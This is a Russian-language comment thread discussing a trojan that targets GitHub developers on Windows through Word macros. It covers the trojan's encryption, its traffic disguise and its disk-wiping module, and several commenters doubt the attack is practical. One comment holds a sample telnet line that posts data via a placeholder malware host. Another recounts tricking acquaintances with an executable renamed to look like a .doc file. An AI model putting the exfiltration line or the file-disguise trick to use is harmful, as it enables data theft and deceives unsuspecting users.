Comments 23
с вложением 2701.zip
Почти «проект 2501» )
В GET-запросе троян передаёт ключ AES 256 ECB, который затем используется для шифрования трафика.
Круче было бы, если бы он с командного сервера получал открытый ключ, и шифровал всё пересылаемое уже им. Тогда из анализа трафика будет даже непонятно, что именно интересного троян увёл.
Мне уже давно не приходят письма со вложениями от спамеров.
В основном предлагают скачать с Яндекс диска.
Гораздо интереснее атака когда батник или экзешник переименовывается в Лехе.doc хотя на самом деле это файл Лdoc.ехе тоже самое с файлом Хоtab.doc.
Я попробовал для теста через Гугл отправлять эти документы, но он не пропустил, сразу сказал що низя.
А вот Яндекс вроде как пропустил, давно уже было не помню.
Но оба сервиса разрешили отправить ссылки на эти файлы.
Причем 2-е из десятка знакомых повелись на этот трюк.
Выскочило сообщение, что типа я их хакнул. Трое отписались мне и написали мне, что меня взломали %).
Собсно тест удался.
если вы разработчик, который работает под Windows (троян использует PowerShell) и открывает документы Microsoft Word
… под локальным администратором...
Тоже не запускает. Приходится добавлять в исключения чтобы макросы в конкретных документах работали, либо настраивать уровень безопасности макросов на "разрешить все" принудительно.
И вообще, макрос там должен быть целевой, порой с разных версий макросы уже не совместимы, темболее макросы микрософта с опенофисом.
Получился разработчик, участвующий в некоем проекте, интересующем западные спецслужбы, при этом имеющий свои наработки, которые он складывает на Гиту, пишущий под винду и под виндой, и использующий для коммуникации Аутлук.
Мда… :)
Предупреждает, что будет все стирать, да еще и реально ждет 3 сек. :)
Но дело в том, что троян вставляет IP-адрес, полученный от DNS-сервера, в заголовок IP-пакета, который выглядит как запрос HTTP GET к серверу Google.
Как-то слишком сложно написано. Вероятно имелось в виду, что происходит подключение к указанному адресу, куда и отправляется GET запрос.
Вроде этого:
$ telnet malware-host.com 80
POST http://gmail.com/upload.php HTTP/1.0
...
Действительно, неожиданно для антивирусов и файрволов…
Но если троянец действительно с легкостью правит IP-пакеты и
Интересно, что один из них — модуль самоуничтожения, который стирает всю информацию на диске C:\.
То ему бы потребовались права администратора.
1. RAW Sockets требуют таких прав:
Note To use a socket of type SOCK_RAW requires administrative privileges. Users running Winsock applications that use raw sockets must be a member of the Administrators group on the local computer, otherwise raw socket calls will fail with an error code of WSAEACCES. On Windows Vista and later, access for raw sockets is enforced at socket creation. In earlier versions of Windows, access for raw sockets is enforced during other socket operations.
2. У пользователя нет прав для удаления файлов из корня системного диска (за исключением файлов в его домашней папке). И это я уже не говорю о том, что не всегда диск C: == «Системный диск».
Таким образом, тот, кто это барахло запускает, должен:
1. Принудительно включить макросы в документе, проигнорировав все предупреждения MS Word или Writer (а они, насколько мне известно, по умолчанию выдают кучу предупреждений «Вы точно-точно-точно хотите запустить макрос?», и то, после того, как пользователь сам осознанно полезет в меню безопасности);
2. Согласиться с повышением привилегий при запуске скачанной малвари.
И это правда сделает человек-разумный-пользователь-git? Хотя, люди разные бывают…
Кто-то пытается взломать пользователей GitHub, которые работают под Windows